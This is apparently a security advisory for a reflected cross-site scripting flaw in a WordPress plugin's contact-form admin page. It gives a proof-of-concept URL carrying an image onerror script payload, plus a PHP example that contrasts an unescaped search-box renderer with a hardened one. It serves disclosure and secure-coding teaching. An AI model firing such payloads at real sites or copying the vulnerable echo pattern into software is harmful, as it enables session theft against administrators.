EPSS Percentile: 46.7%
The plugins do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting issue.
http://example.com/wp-admin/admin.php?page=chaty-contact-form-feed&search=<%2Fscript><img+src+onerror%3Dalert(/XSS/)>
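As an added illustration (not the plugin's code and not part of the advisory), a hypothetical admin search-box handler shows the unescaped pattern the advisory describes next to a hardened version that sanitises the value on input and escapes it for the HTML attribute context on output; the `wp_unslash`, `sanitize_text_field` and `esc_attr` fallbacks are simplified stand-ins for the WordPress core functions so the file runs outside WordPress.

```php
<?php
// Added example: a hypothetical admin "search" field renderer. It is not the
// plugin's actual code; it illustrates the class of bug the advisory describes.

// Simplified stand-ins so this runs outside WordPress. Inside WordPress the
// real core functions (wp_unslash, sanitize_text_field, esc_attr) are used.
if (!function_exists('wp_unslash')) {
    function wp_unslash($v) { return stripslashes((string) $v); }
}
if (!function_exists('sanitize_text_field')) {
    // Approximation of WordPress behaviour: strip tags, drop line breaks, trim.
    function sanitize_text_field($v) {
        return trim(str_replace(["\r", "\n"], '', strip_tags((string) $v)));
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr($v) {
        return htmlspecialchars((string) $v, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Vulnerable pattern: the raw request value is echoed straight into the page,
// so a value containing a quote or a tag breaks out of the attribute.
function render_search_box_vulnerable(array $get): string {
    $search = isset($get['search']) ? $get['search'] : '';
    return '<input type="text" name="search" value="' . $search . '">';
}

// Hardened pattern: unslash and sanitise on input, and escape for the
// attribute context on output. esc_attr() is the step that actually prevents
// the injection; sanitize_text_field() is defence in depth.
function render_search_box_hardened(array $get): string {
    $search = isset($get['search'])
        ? sanitize_text_field(wp_unslash($get['search']))
        : '';
    return '<input type="text" name="search" value="' . esc_attr($search) . '">';
}

// Constructed input mirroring the advisory's payload shape, as PHP would see it
// after URL decoding ($_GET would hold the same string in a real request).
$request = ['search' => '</script><img src onerror=alert(/XSS/)>'];

echo "vulnerable: " . render_search_box_vulnerable($request) . PHP_EOL;
echo "hardened:   " . render_search_box_hardened($request) . PHP_EOL;
```

Run with `php example.php`: the vulnerable line contains the injected tag verbatim, while the hardened line renders a harmless attribute value.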